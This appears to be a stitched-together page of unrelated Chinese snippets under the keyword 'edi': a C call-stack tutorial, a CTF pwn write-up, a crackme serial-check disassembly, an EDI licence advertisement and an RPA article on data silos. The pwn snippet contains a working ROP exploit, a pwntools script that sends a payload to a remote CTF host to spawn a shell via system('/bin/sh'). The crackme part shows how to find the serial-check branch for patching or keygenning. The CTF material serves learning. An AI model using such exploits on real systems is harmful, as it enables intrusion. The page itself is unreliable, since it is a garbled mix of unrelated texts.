edi

文章来源： https://blog.seclibs.com/函数调用堆栈图-c语言/ 我们就使用一个简单的c语言程序来对描述一下在函数调用的时候都发生了什么。 中间的一小段没有意义的汇编语言是为了方便设置断点，为后面的调试做好铺垫，因为有时会碰到找不到断点位置的情况，使用这个方法，可以在找不到断点的时候向后执行一次，而不破坏我们想调试的程序当前的堆栈状态，这里对main函数和sum函数的效果是类似的，这里直接跟着断点来执行分析sum函数的堆栈操作。 我们先假设初始状态下的堆栈图如下，esp与ebp的真实距离我们省略。 接下来我们来看一下后面的操作。 在程序的执行当中，我们一般都是按照从右向左的方式去处理的，这里也不例外，我们可以发现当我们调用sum函数对数字1和数字2进行处理的时候，将数字2和1依次压入栈中，这个时候堆栈的情况是这个样子的，esp的值已经减8。 接下来调用了call，这时进行了两步操作，先将call后面的地址push进堆栈，然后再jmp到call所调用的地址。 因为jmp是不会影响堆栈的，所以现在的堆栈情况是这样的 然后因为编译器的原因在call的时候还会有一个jmp来中转到后面的处理函数，因为jmp不影响堆栈，我们可以忽略掉它，这里是跳转到了sum函数的处理位置。 此时的堆栈是没有发生变化的，现在开始到了函数调用的关键阶段了。 首先先将ebp的值push到堆栈中

先用checksec检查一下 只开启了NX保护 打开ida，找到buf 点击buf查看长度算出偏移量为0x80+8（64位） 由于64位的参数传递是用edi传递，利用程序自己的带有pop edi/rdi;ret语句达到给edi赋值的效果。pop edi语句是将当前的栈顶元素传递给edi，在执行pop语句时，只要保证栈顶元素是”/bin/sh”的地址，并将返回地址设置为system。(摘自 yudhui ) ROPgadget --binary level2_x64.04d700633c6dc26afc6a1e7e9df8c94e -- only 'pop|ret' |grep 'rdi' 0x00000000004006b3 : pop rdi ; ret 找到程序的pop rdi地址； 找到bin和system地址。 之后就可构造exp了 from pwn import * sh = remote('pwn2.jarvisoj.com',9882) offset = 0x88 popaddr = 0x4006b3 binaddr = 0x600a90 sysaddr = 0x40063e payload = offset*'a' + p64(popaddr)+p64(binaddr)+p64(sysaddr) sh.recvline() sh.sendline(payload)

前言 打开程序，是一个很简单的界面。看来是要我们根据 用户名 写出对应的 序列号 。 如图。 分析 输入任意字符，搜索字符串 "You get Wrong" "Try Again" , 找到 判断关键跳转 的地方。 00402579 . 66:85F6 test si, si 0040258B . 74 58 je short 004025E5 0040258D . 68 801B4000 push 00401B80 ; UNICODE "You Get It" 00402592 . 68 9C1B4000 push 00401B9C ; UNICODE CR,LF 00402597 . FFD7 call edi 00402599 . 8BD0 mov edx, eax 0040259B . 8D4D E8 lea ecx, dword ptr [ebp-18] 0040259E . FFD3 call ebx 004025A0 . 50 push eax 004025A1 . 68 A81B4000 push 00401BA8 ; UNICODE "KeyGen It Now" 004025E5 > 68 C81B4000 push 00401BC8 ; UNICODE "You Get Wrong" 004025EA . 68 9C1B4000 push 00401B9C ;

互联网时代，如果企业还是对互联网资质一知半解，那网站很可能就因为资质问题而被关停罚款，甚至遭到更严重的惩罚，所以企业不了解互联网资质就在网络上运营网站是不可取的，小编就给大家介绍一种互联网资质EDI经营许可证。 现在淘宝天猫等电商平台都深受消费者的欢迎，双十一双十二更是非常火爆，很多企业就也想要做一个这样的电商平台，邀请一下商家入驻企业平台售卖产品，而这样的平台，首先得有一个EDI经营许可证。 EDI经营许可证办理流程： 1、收集申请需要的材料。 2、网上提交电子版的盖章的材料。 3、网上材料审核通过后就该提交书面材料了，书面材料提交时如果受理会给你个受理单。 4、领取资质；审核通过后即可获得EDI经营许可证。 需要注意的是，EDI经营许可证对公司注册资金有一定的要求，不符合要求的企业需要先申请增资，再申请EDI经营许可证。而且，外资公司也不是不可以申请EDI经营许可证，只要符合一定的要求，也是可以的。 不是所有的网站都是需要ICP经营许可证的，具体需要哪种资质，得看企业网站的实际情况，企业网站运营业务是什么。如果企业网站想要邀请第三方商家入驻，那么没有一个EDI经营许可证撑门面肯定是不行的，现如今网络监管力度越来越大，没有资质的网站已经发现会被关停罚款，如果企业不及时申请资质，又有哪个商家敢入驻呢？ 【万华财务】会计师告诉我们：EDI经营许可证属于互联网资质中的一种

【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 信息化、智能化是企业发展的潮流和趋势，但信息化的发展给企业带来难得机遇的同时，也令企业面临着巨大的挑战。为了高效完成内外部业务的处理和管理工作，企业引入了众多信息系统，但这些信息系统只关注各自领域的数据管理与业务处理，由于缺少相应的接口标准和规范，它们各自为政，相互之间无法进行信息共享与业务集成，从而形成一个个“信息孤岛”。信息孤岛是数字时代企业之痛，又称“数据孤岛”，伴随企业信息化的进程广泛存在于每个企业中。 随着企业规模的不断扩大，应用系统不断增加，对信息共享、跨系统操作和软件重用方面的要求越来越高，这些相对独立、标准各异的“烟囱”式系统已经不能满足业务的需要，对企业来说无疑是巨大的挑战。 面对这样的挑战，越来越多的企业意识到，实现流程优化升级，降低运营成本，并从信息和数据中获得更有价值的洞察，必须要打通“数据孤岛”，系统整合成为企业迫在眉睫的问题。传统解决信息孤岛问题只有两种方式：一是借助 EDI、ETL、ESB、EAI、BI 等技术；二是人力手工完成跨系统跨应用的数据维护。但是，统一双方数据对接的方式有很多弊端：数据接口的投入高、协调难、周期长，这让很多企业陷入纠结。而人力手工操作跨系统跨应用的数据维护方式从效率、准确率和安全性的角度来看都不是最佳的选择。这时，RPA在解决打通企业信息烟囱、整合“孤岛式